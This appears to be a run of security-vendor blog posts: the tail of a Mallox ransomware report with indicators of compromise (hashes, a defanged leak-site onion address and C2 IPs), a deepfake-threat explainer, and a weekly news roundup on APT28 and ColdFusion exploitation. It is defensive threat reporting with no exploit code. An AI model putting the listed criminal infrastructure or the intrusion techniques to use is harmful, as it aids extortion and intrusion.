Encrypted files are appended with the .mallox extension, and a ransom note with the file name “HOW TO BACK FILES.TXT” is written to each folder containing locked files. The ransom note contains instructions on how to obtain a decryption tool using TOR and contains a TargetID, a unique identifier for the victim. Beginning in mid-2023, we observed that the contact email in the Mallox ransom notes changed from “mallox@onionmail” to “mallox.resurrection@onionmail.org”.

In addition to the ransom notes, a file called “Targetinfo.txt” is written to the user’s Desktop. This file also contains the TargetID along with basic details of the host’s environment (OS version, architecture, hostname, etc.).

Example of a Mallox.Resurrection ransom note

Victims who do not respond to the ransom demand are threatened with exposure of their data on the group’s data leak site.

Mallox Data Leak Site

Conclusion

Despite previously suffering setbacks such as the release of a public decryptor for earlier versions of its payloads, Mallox has maintained a steady stream of compromises and iterated on successful versions of its ransomware. The continued abuse of unpatched MS-SQL interfaces and brute-forcing of weak passwords suggests the group sees little need to alter its MO while organizations leave such a fruitful avenue open to exploitation.

The group’s longevity provides a sharp reminder that cybersecurity basics will go a long way to keeping such threats at bay. Reviewing and hardening applications and services exposed to the public internet is strongly recommended, along with deployment of appropriate endpoint and cloud security solutions like SentinelOne.

All SentinelOne customers are protected from Mallox ransomware.

To learn about how SentinelOne can help protect the devices in your fleet from ransomware and other threats, contact us or request a free demo.

Indicators of Compromise

3d434b7cc9589c43d986bf0e1cadb956391b5f9a  updt.ps1
9295a02c49aa50475aa7876ca80b3081a361ff7d  updt.ps1

3fa79012dfdac626a19017ed6974316df13bc6ff  Bwmeldokiller.bat
7e7957d7e7fd7c27b9fb903a0828b09cbb44c196  Kill-Delete.bat

Mallox Ransomware Payloads

Mallox DLS (Data Leak Site)
http[:]//wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad[.]onion/

Mallox Distro / C2 IP Addresses
104[.]21.76.77
104[.]237.62.211
172[.]67.191.103
64[.]185.227.155
80[.]66.75.37

Beyond Illusion | Addressing the Cybersecurity Impact of Deepfakes and Synthetic Media
https://www.sentinelone.com/blog/beyond-illusion-addressing-the-cybersecurity-impact-of-deepfakes-and-synthetic-media/
Tue, 12 Dec 2023 14:30:34 +0000

In the last few years, slowly but steadily, the boundary between reality and fiction in the digital realm has become increasingly blurred thanks to the advent of deepfake technology.

Sophisticated, AI-powered synthetic media has evolved from a novel concept in Hollywood to a practical tool used daily by politically-motivated threat actors and cybercriminals for misinformation and fraud.

Since we last wrote about deepfakes a lot has changed. There are new powerful actors, with both old and new grievances, and of course, an explosion in the availability and capabilities of AI. Our trust in the veracity of what we see online has never been lower, nor more fragile.

In this post, we delve into the world of deepfakes as we see it today, exploring the nature, risks, real-life impacts, and measures needed to counter these advanced threats.

What Are Deepfakes?

Deepfakes are artificially-created media, typically video and audio, that purport to show events or people engaging in behaviors that never in fact occurred. They leverage sophisticated artificial intelligence (AI) and machine learning technologies, in particular generative adversarial networks (GANs).

GANs involve two AI models: one that generates content (the generator) and another that evaluates its authenticity (the discriminator). The generator creates increasingly realistic fake videos or audio, while the discriminator continuously assesses the content’s verisimilitude, leading to a rapid improvement in the quality and believability of the generated fakes.

Originally, deepfakes found their place in entertainment and social media, providing novel ways to create content, like superimposing celebrities’ faces onto different bodies in videos or enabling realistic voice impersonations. However, this technology’s potential for creating highly convincing forgeries soon transitioned from mere novelty to a potent tool for misinformation and manipulation.

The Cybersecurity Risks of Deepfakes | A Broad Spectrum

From political disinformation to financial deception, the ramifications of deepfakes are far-reaching and multifaceted. Let’s explore some key examples to understand the breadth and depth of these risks.

Political Disinformation

Deepfakes pose a significant risk to political stability by spreading false narratives and manipulating public opinion, particularly when they are used to create misleading representations of political figures. The first notable example occurred in 2018, when BuzzFeed released a deepfake of President Obama.

Since then, many others have come to light; a deepfake video of Ukrainian President Volodymyr Zelensky falsely portrayed him as conceding defeat and urging Ukrainians to surrender to Russia. Aimed at misleading and demoralizing the public, the video was identified as fake due to discrepancies such as the mismatched size of Zelensky’s head to his body.

Corporate Espionage

In the corporate world, deepfakes have emerged as tools for fraud and deception with the potential to cause substantial financial losses. Such scams can be particularly effective when impersonating high-level executives. A UK-based energy firm lost €220,000 after AI software was used to imitate the voice of the CEO of the firm’s German parent company and instruct the UK CEO to urgently transfer funds.

Personal Identity Theft and Harassment

Personal rights and privacy are, of course, highly susceptible to harm from fake media when it is used to commit identity theft and harassment. Malicious media creations can be alarmingly realistic. In Germany, the government was so concerned about the threat of deepfakes that it released an ad campaign to highlight the dangers, warning parents about the risks associated with these technologies.

Financial Market Manipulation

Beyond harm to individual persons or organizations, deepfakes can disrupt entire financial markets by swaying investor decisions and market sentiments with false narratives. An illustrative case was the deepfake video depicting a supposed explosion near the Pentagon, which briefly impacted the US stock markets.

Legal and Judicial Misuse

In the legal domain, deepfakes can be used to fabricate evidence, potentially leading to miscarriages of justice and undermining the integrity of judicial processes. Although a specific widespread instance in legal settings is yet to occur, the potential for deepfakes to be used in this manner raises concerns about the reliability of video and audio evidence in courtrooms and the need for enhanced verification measures to ensure judicial integrity.

Detecting and Combating Deepfakes | On the Cybersecurity Frontline

As with any tool, AI can be used for both good and bad, and there are efforts underway to develop AI-driven methods to detect and combat the threat of deepfakes. Many of these efforts focus on analyzing facial expressions and voice biometrics to spot subtle anomalies that are undetectable to the human eye and ear. This involves using machine learning models and training them on extensive datasets containing both genuine and manipulated media in order to effectively distinguish between the two.

Blockchain technology, more typically associated with cryptocurrencies, is also emerging as a useful tool in this fight. Blockchain provides a way to verify the source and authenticity of media files and confirm whether they have been altered. So-called “smart contracts” can be used both to verify the authenticity of digital content and to trace how it is interacted with, including any modifications. Combined with AI that can flag media content as potentially inauthentic, a smart contract can trigger a review process or alert relevant authorities or stakeholders.

Other tools are being developed to ensure that content created by AI platforms can be detected as artificial. For example, Google’s SynthID can embed inaudible “watermarks” in AI-generated audio content. Methods like SynthID are intended to ensure that content generated by AI tools remains reliably detected as artificially generated even after it has been manipulated by humans or other editing software.

As in other areas of cybersecurity, education and awareness campaigns have an important part to play in combating the threat of deepfakes. Educating individuals and organizations about deepfakes, how to spot them, and their potential impact will be essential. Collaborations between technology companies, cybersecurity experts, government agencies, and educational institutions will prove to be vital over the next few years as we strive to develop more comprehensive strategies to combat artificially-generated content used for ill ends.

Best Practices for Organizations and Individuals in the Era of Deepfakes

As the threat landscape shaped by deepfakes continues to evolve, it is increasingly important to adopt strategies to mitigate risks associated with the misuse of AI technology. Here is our guide to current best practices and measures to enhance resilience against deepfake-related security threats.

Raising Awareness and Training

Education is the cornerstone of defense against deepfakes. Conducting regular training sessions for employees to recognize deepfakes can significantly lower the risk of deception. This training should focus on the subtleties of synthetic media and keep abreast of the latest developments in deepfake technology.

Cultivating a verification culture within organizations, where any unusual or suspicious communication, particularly involving sensitive information, is cross-verified through multiple channels, is also crucial.

Implementing Robust Verification Processes

For critical communications, especially in financial and legal contexts, implementing multi-factor authentication and rigorous verification processes is indispensable. For instance, voice and video call confirmations for high-stake transactions or sensitive information sharing can be effective. Such practices can prevent incidents similar to the aforementioned case in which a CEO’s voice was faked for fraudulent activities.

Utilizing Advanced Cybersecurity Solutions

We can leverage AI to defeat AI by incorporating advanced cybersecurity solutions with deepfake detection capabilities. Tools employing AI and machine learning to analyze and flag potential deepfakes add an important layer of security.

Regular Software and Security Updates

Maintaining up-to-date software, including security solutions, is vital for cybersecurity. Updates often contain patches for newly identified vulnerabilities that could be exploited by deepfakes and other cyber threats. A proactive stance on software updates can significantly reduce the likelihood of security breaches.

Collaborating with External Experts

For organizations, particularly those with limited in-house cybersecurity capabilities, partnering with external security experts can offer enhanced protection. These professionals can provide insights into the latest threats and assist in crafting strategies specifically designed to counter deepfakes and other emerging cyber risks.

Personal Vigilance

As individuals, it is important for all of us to maintain vigilance when engaging with media. This includes maintaining a healthy skepticism towards sensational or controversial content and verifying sources before sharing or acting on such information.

Utilizing tools and browser extensions that assist in detecting deepfakes can also contribute to stronger personal cybersecurity practices.

It’s also worth remembering that, like any other creation, deepfakes come with varying degrees of quality and attention to detail from the creator. That means in some cases it is still possible to spot less-advanced or sophisticated deepfakes. Some things to watch out for include:

  • Unnatural Eye Movements: AI-generated images or videos can fail to accurately replicate intricate and natural eye movements. This discrepancy can manifest as unusual blinking patterns or a lack of natural eye movement.
  • Audio-Video Sync Issues: Some deepfakes can fail to sync spoken words and lip movements, leading to noticeable discrepancies.
  • Color and Shadow Inconsistencies: AI often struggles with consistently rendering colors and shadows, especially in varying lighting conditions. Look out for inconsistencies in skin tones or background colors. Shadows might appear misplaced or of the wrong intensity.
  • Unusual Body Movements: AI might also struggle to maintain the consistency of body shapes, leading to noticeable distortions or irregularities. This might include jerky, unnatural movements or expressions that don’t align with how a person typically moves or reacts.

In short, combating deepfakes requires a multi-faceted approach, combining education, robust verification processes, advanced technology, software maintenance, expert collaboration, and personal vigilance. These practices form an integral part of a comprehensive strategy to counter the growing sophistication of deepfakes in the cybersecurity landscape. As a bonus, they will also help protect against other kinds of cybersecurity threats and serve to encourage the security mindset individuals and organizations need in today’s digital-centric world.

The Future of Deepfakes and Cybersecurity

The deepfake genie is out of the bottle and we cannot wish it away. Rather, as deepfakes become increasingly prevalent and ever-more subtle, we will need to evolve effective responses. This will entail development in certain key areas.

Aside from continued development of advanced authentication tools, industry leaders, including AI developers like OpenAI and cybersecurity firms, will need to steer the development and application of AI technologies to both establish ethical guidelines and ensure robust defense mechanisms against deepfake threats.

New legislation and regulations will also be required to prohibit and penalize the creation and dissemination of deepfakes for harmful purposes. Due to the transnational nature of digital media, international collaboration in legal frameworks will also be needed to effectively combat deepfakes.

As we’ve noted above, educating the public about deepfakes and enhancing media literacy are an integral part of countering the threat of manipulated media. Technology and regulation alone cannot win the fight across the broad spectrum of online surfaces in which misinformation can be disseminated.

The inevitable proliferation of deepfakes demands a multi-dimensional approach, combining technological innovations, ethical industry practices, informed legislative measures, and public education. We are only at the mercy of technology when we fail to take the time to understand its implications or develop the appropriate controls. When it comes to AI and deepfakes, we still have meaningful opportunities to do both.

The Good, the Bad and the Ugly in Cybersecurity – Week 49
https://www.sentinelone.com/blog/the-good-the-bad-and-the-ugly-in-cybersecurity-week-49-5/
Fri, 08 Dec 2023 14:00:23 +0000

The Good | Co-Founder of Criminal Crypto Exchange Pleads Guilty to Money-Laundering Schemes

Anatoly Legkodymov (aka “Gandalf” or “Tolik”), co-founder of the Bitzlato cryptocurrency exchange, has pleaded guilty to his role in aiding ransomware gangs and other cybercriminals in laundering over $700 million. Legkodymov has agreed to disband Bitzlato and forfeit his claim to approximately $23 million in seized assets, according to the terms of his plea agreement.

Source: Forbes

Bitzlato reportedly saw widespread illicit activity on its platform. The exchange promoted a user registration process with minimal identification requirements, explicitly stating that neither selfies nor passports were necessary. According to the DoJ, this lax approach led to Bitzlato becoming a haven for criminal proceeds and funds intended for a variety of malicious activities.

Reports on cryptocurrency-related illicit activity revealed that Bitzlato conducted over $2 billion in cryptocurrency transactions between 2019 and 2021 alone. Nearly 48% of this amount, approximately $966 million, was associated with high-risk cryptocurrency transactions and deemed illicit. The exchange received funds totaling $206 million from darknet markets, $224.5 million from scams, and $9 million from ransomware attackers.

The crypto exchange was also known to be particularly entwined with the Hydra Market, facilitating more than $700 million worth of cryptocurrency exchanges until the dark market was shut down by U.S. and German law enforcement in April 2022. The exchange also received millions in ransomware proceeds, despite repeated warnings to Legkodymov that the routed cryptocurrency represented the proceeds of crime and was intended for illicit transactions.

Dismantling Bitzlato’s digital infrastructure and the subsequent seizure of its domains was a collaborative effort from Europol and authorities in France, Spain, Portugal, and Cyprus. After his initial arrest in Miami earlier this year, Legkodymov now faces a maximum sentence of five years in prison for his role in the illicit activities associated with Bitzlato.

The Bad | APT28 Actors Re-Use Old Outlook Vulnerability to Access Polish Exchange Accounts

Security researchers have identified the Russian state-sponsored actor APT28 (aka Fancy Bear or Sofacy) exploiting a recently-patched flaw (CVE-2023-23397) in Microsoft Outlook to gain unauthorized access to accounts within Exchange servers. Before it was fixed in March, targets spanned critical sectors in the United States, Europe, and the Middle East. Based on the new wave of attacks, Polish Cyber Command (DKWOC) reports that the attacker’s goal now is to obtain unauthorized access to mailboxes belonging to public and private entities that have yet to patch their instances.

CVE-2023-23397 is a critical-level (CVSS score: 9.8) elevation of privilege (EoP) vulnerability triggered by a specially-crafted email message that is sent to a targeted user. Once the message is opened, the user’s Net-NTLMv2 hash is transmitted to the attacker, allowing them to manipulate the access permissions of specific mailboxes and steal sensitive information and/or credentials.

Source: Microsoft

The state-sponsored group linked to APT28 has been active since 2008, known most widely for interfering in the 2016 U.S. presidential election and their engagement in various hack-and-leak operations. Their victims are typically high-value, coming from governments, military, and private sectors. Just two months ago, the National Cybersecurity Agency of France (ANSSI) pinned a cluster of attacks on agencies, universities, think tanks, and research institutions onto the threat group, where they leveraged a combination of flaws, including CVE-2023-23397, to deploy stealers in prominent web browsers.

APT28 commonly employs other known vulnerabilities as part of their attack methods, such as CVE-2023-38831 or CVE-2021-40444. The recent incidents underscore the persistent challenges posed by sophisticated state-sponsored threat actors and the importance of promptly applying security patches to mitigate the risk of exploitation.

The Ugly | Unidentified Actors Exploit Adobe ColdFusion Flaw to Breach U.S. Government Servers

Threat actors are actively exploiting a high-severity vulnerability found in Adobe’s ColdFusion to gain initial access into U.S. government servers. According to CISA’s latest warning on the mounting attacks, the flaw tracked as CVE-2023-26360 presents an improper access control issue that could lead to arbitrary code execution.

Source: CISA

The advisory highlights two incidents of exploitation where CVE-2023-26360 was utilized to compromise federal agency systems. Both instances involved outdated server software vulnerable to various CVEs, with threat actors leveraging the vulnerability to deploy malware through HTTP POST commands to the ColdFusion-associated directory path.

During the first incident, attackers breached a server running Adobe ColdFusion v2016.0.0.3. They performed process enumeration, network checks, and installed a web shell for code injection into a ColdFusion configuration file to extract credentials. The attackers then followed with tactics such as file deletion and creation in specific directories to conceal their activities.

The second incident involved attackers exploiting the flaw on a server running Adobe ColdFusion v2021.0.0.2. After gathering user account information, they deployed a remote access trojan in the form of a text file. Attempts were made to exfiltrate Registry files and security account manager (SAM) information, utilizing security tools to access a directory on domain controllers. Fortunately, both attacks were detected and thwarted before any data exfiltration or lateral movement occurred, with compromised assets removed from critical networks within 24 hours.

CISA categorizes these incidents as reconnaissance efforts, although it remains uncertain whether the same threat actor is responsible for both intrusions. To mitigate risks, CISA recommends updating ColdFusion to the latest version, implementing network segmentation, configuring firewalls or web application firewalls (WAFs), and enforcing policies for signed software execution.
